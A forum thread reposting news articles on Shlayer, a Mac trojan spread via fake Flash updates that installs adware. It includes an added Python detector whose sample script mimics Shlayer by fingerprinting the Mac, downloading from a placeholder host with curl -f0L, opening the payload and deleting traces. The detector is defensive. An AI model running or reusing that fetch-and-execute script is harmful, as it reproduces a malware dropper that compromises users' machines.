Mac users are getting bombarded by laughably unsophisticated malware


Karlston

For malware so trite and crude, Shlayer is surprisingly prolific.


Almost two years have passed since the appearance of Shlayer, a piece of Mac malware that gets installed by tricking targets into installing fake Adobe Flash updates. It usually does so after promising pirated videos, which are also fake. The lure may be trite and easy to spot, but Shlayer continues to be common, so much so that it is the number one threat encountered by users of Kaspersky Lab's antivirus programs for macOS.

 

Since Shlayer first came to light in February 2018, Kaspersky Lab researchers have collected almost 32,000 different variants and identified 143 separate domains operators have used to control infected machines. The malware accounts for 30 percent of all malicious detections generated by Kaspersky Lab's Mac AV products. Attacks are most common against US users, who account for 31 percent of attacks Kaspersky Lab sees. Germany, with 14 percent, and France and the UK (both with 10 percent) followed. For malware using such a crude and outdated infection method, Shlayer remains surprisingly prolific.

 

An analysis Kaspersky Lab published on Thursday says that Shlayer is “a rather ordinary piece of malware” that, except for a recent variant based on a Python script, was built on Bash commands. Under the hood, the workflow for all versions is similar: they collect IDs and system versions and, based on that information, download and execute a file. The download is then deleted to remove traces of an infection. Shlayer also uses curl with the combination of options -f0L, which Thursday's post said “is basically the calling card of the entire family.”

 

Another banal detail about Shlayer is its previously mentioned infection method. It's seeded in links that promise pirated versions of commercial software, episodes of TV shows, or live feeds of sports matches. Once users click, they receive a notice that they should install a Flash update. Never mind that Flash has been effectively deprecated for years and that platforms offering warez and pirated content are a known breeding ground for malware.

Second verse, same as the first

The file downloaded by the Python variant Kaspersky Lab analyzed installs adware known as Cimpli. It ostensibly offers to install applications such as Any Search, which as indicated by search results is clearly a program no one should want. Behind the scenes, it installs a malicious Safari extension and a tool that includes a self-signed TLS certificate that allows the extension to view encrypted HTTPS traffic.

 

To work around any user suspicions, Cimpli superimposes its own windows over dialog boxes that macOS provides. The left windows in the image below are what targeted users see when Cimpli is installing the Safari extension. The window to the right is what’s covered up. By clicking on the button, the user unwittingly agrees to install the extension. The HTTPS decryption tool also superimposes a fake window over the installation confirmation box. Once installed, all user traffic is redirected to an attacker-controlled proxy server.

[Image: bait-and-switch. Left: the windows Cimpli shows the user; right: the macOS dialog they cover. Credit: Kaspersky Lab]

Shlayer traditionally has relied on paid affiliates to seed advertising landing pages that display the fake Flash updates. Kaspersky Lab said Shlayer offers some of the highest rates. A newer ploy is the embedding of malicious links in pages on Wikipedia and YouTube. Kaspersky Lab said a single affiliate did so by registering more than 700 expired domains.

 

It’s hard to believe that malware this artless would be among the most common threats facing Mac users. One explanation may be that Shlayer operators must bombard Mac users over and over in a brute-force fashion to compensate for extremely low success rates. A more somber, and probably less likely, possibility: the success rate is high enough that operators keep coming back for more. In either case, it’s likely that the help of affiliates contributes to Shlayer’s ranking.

 

In any event, Shlayer’s ranking is a good reason for people to remember that Flash is an antiquated browser add-on that presents more risk than benefit for the vast majority of the world. For those who must use it, they should download updates solely from https://get.adobe.com/flashplayer/.

 

People should never receive updates from windows that are displayed when trying to view videos or install software. The distinction can be hard for less experienced users, because Flash itself presents—or at least used to present—notifications when updates were available. People also would do well to steer clear of sites offering pirated material.

 

 

Source: Mac users are getting bombarded by laughably unsophisticated malware (Ars Technica)  

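An added example, not part of either article or of Kaspersky Lab's analysis: a small Python checker for the Shlayer workflow the post describes (collect machine IDs and the OS version, download with curl -f0L, run the download, delete it). It parses each script line with shlex rather than grepping for the literal string "-f0L", so it catches the calling card in any clustering order (-f0L, -L0f) and under the long option spellings (--fail, --http1.0, --location). The two sample scripts, the placeholder hostnames and the command-name sets used as indicators are constructed for this example; they are not taken from real Shlayer samples or from any published signature.

```python
import shlex

# Constructed sample that follows the workflow the article describes. It is
# illustrative only, not a real Shlayer script; the hostname is a placeholder.
SAMPLE_SHLAYER_LIKE = """#!/bin/bash
UUID=$(ioreg -rd1 -c IOPlatformExpertDevice | awk '/IOPlatformUUID/ {print $3}')
OSV=$(sw_vers -productVersion)
OUT="/tmp/$RANDOM"
curl -f0L "http://stage.example.invalid/d?u=$UUID&v=$OSV" -o "$OUT.zip"
unzip -qo "$OUT.zip" -d "$OUT" && open "$OUT/Installer.app"
rm -rf "$OUT.zip"
"""

# Constructed benign installer for comparison: it downloads with curl as well,
# but without the HTTP/1.0 (-0) option, fingerprinting, execution or cleanup.
SAMPLE_BENIGN = """#!/bin/sh
curl -fsSL https://downloads.example.invalid/tool.tar.gz -o tool.tar.gz
tar xzf tool.tar.gz
"""

# Long-option spellings of the three flags in the calling card:
# -f = --fail, -0 = --http1.0, -L = --location.
CURL_LONG_TO_SHORT = {"--fail": "f", "--http1.0": "0", "--location": "L"}
CALLING_CARD = {"f", "0", "L"}
SEPARATORS = {"|", "||", "&&", "&", ";", "(", ")"}

# Command names treated as indicators. These sets are assumptions made for the
# example, chosen to match the behaviour the article describes.
FINGERPRINT_CMDS = {"ioreg", "sw_vers", "system_profiler"}
EXEC_CMDS = {"open", "sh", "bash", "zsh"}
CLEANUP_CMDS = {"rm"}


def split_commands(line):
    """Split one shell line into simple commands (lists of tokens).

    shlex with punctuation_chars keeps quoted strings intact and turns pipes,
    &&, ; and subshell parentheses into separate tokens we use as boundaries.
    """
    lex = shlex.shlex(line, posix=True, punctuation_chars=True)
    lex.whitespace_split = True
    commands, current = [], []
    try:
        for tok in lex:
            if tok in SEPARATORS:
                if current:
                    commands.append(current)
                current = []
            else:
                current.append(tok)
    except ValueError:  # unbalanced quotes: keep what was parsed so far
        pass
    if current:
        commands.append(current)
    return commands


def strip_assignments(tokens):
    """Drop leading VAR=value prefixes so the command word is tokens[0]."""
    i = 0
    while i < len(tokens):
        tok = tokens[i]
        if "=" in tok and not tok.startswith("-") and tok.split("=", 1)[0].isidentifier():
            i += 1
        else:
            break
    return tokens[i:]


def curl_flags(tokens):
    """Single-letter curl options after the command word, expanding clustered
    forms (-f0L, -L0f, -fsSL) and the long spellings of f, 0 and L."""
    flags = set()
    for tok in tokens[1:]:
        if tok in CURL_LONG_TO_SHORT:
            flags.add(CURL_LONG_TO_SHORT[tok])
        elif tok.startswith("-") and not tok.startswith("--") and len(tok) > 1:
            flags.update(tok[1:])
    return flags


def analyze(script):
    """Return the sorted list of Shlayer-style indicators found in a shell script."""
    found = set()
    for line in script.splitlines():
        for tokens in split_commands(line):
            tokens = strip_assignments(tokens)
            if not tokens:
                continue
            name = tokens[0].rsplit("/", 1)[-1]  # basename, so /usr/bin/curl counts
            if name == "curl" and CALLING_CARD <= curl_flags(tokens):
                found.add("curl_f0L")
            elif name in FINGERPRINT_CMDS:
                found.add("collects_system_ids")
            elif name in EXEC_CMDS:
                found.add("executes_payload")
            elif name in CLEANUP_CMDS:
                found.add("removes_artifacts")
    return sorted(found)


def looks_like_shlayer(script):
    """Calling card present plus at least two of the other workflow steps."""
    indicators = analyze(script)
    return "curl_f0L" in indicators and len(indicators) >= 3


if __name__ == "__main__":
    for label, script in (("sample", SAMPLE_SHLAYER_LIKE), ("benign", SAMPLE_BENIGN)):
        print(label, analyze(script), looks_like_shlayer(script))
```

Of the three options, -0 (force HTTP/1.0) is the unusual one; -f and -L appear in countless legitimate "curl | sh" installers, which is why the benign sample with -fsSL is not flagged and why looks_like_shlayer also requires two of the other workflow steps before calling a script suspicious.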



 

Apple Macs are the target of dangerous malware called Shlayer. In operation for two years now, this malware managed to contaminate 10% of computers running macOS last year. The malware affects more than 1 in 10 Mac users, reports Kaspersky.

MAC MALWARE SHLAYER INFECTS MACOS

“The Shlayer Trojan is the most common threat on macOS,” Kaspersky Lab experts announced in a report on January 23, 2020. In 2019, the malware was present on one in ten Macs. Users resident in France, Germany, the United States and the United Kingdom are the most affected, according to Kaspersky's investigation.

Once installed on the victim’s computer, the malware will display dozens of advertisements on the screen. In this way, hackers quickly recover significant advertising revenue. “The macOS platform is a good source of income for cybercriminals,” warns Kaspersky. However, “the most widespread threats are linked to illicit advertising,” reassures the report. Collateral damage: your Mac’s performance can quickly deteriorate.

SHLAYER MALWARE HIDES IN FAKE FLASH UPDATES

To infiltrate the computers of its victims, Shlayer hides in fake Flash updates. These dummy updates are flooding many illegal streaming websites. Before users can watch a series or a movie, a pop-up window will regularly ask them to install the latest update to Flash Player.

Statistics show that the majority of Shlayer attacks are against users in the U.S. (31%), followed by Germany (14%), France (10%), and the UK (10%). This is wholly consistent with the terms and conditions of partner programs that deliver the malware, and with the fact that almost all sites with fake Flash Player download pages had English-language content.

Site: https://www.gizchina.com/2020/01/28/mac-shlayer-malware-infects-10-of-macos-computers/

 



Similar topic merged from General News.

 

(Malware, so better here)



21 minutes ago, duddy said:

OK @Karlston bro.

Thanks for the modification so as to make it comply to the appropriate forum.

 

You're very welcome.

 

IME, it takes a while to get used to where news posts belong, especially where there's more than one possibility. If in doubt, PM me or @Mach1  and we'll gladly point you in the right direction and explain why.

 

Also, remember to use Search before posting. There are several members posting news, so it may already be posted. That said, if you think your news item adds value to an existing topic, feel free to add a reply to that topic with your news item.

 

Finally, if you post something and realise afterwards that it or something similar is already posted, or is in the wrong News forum, or something else is not right with it, please use the "Report post" link at the top right of the post, add a brief comment and submit it. That way staff will see it quickly and deal with it.
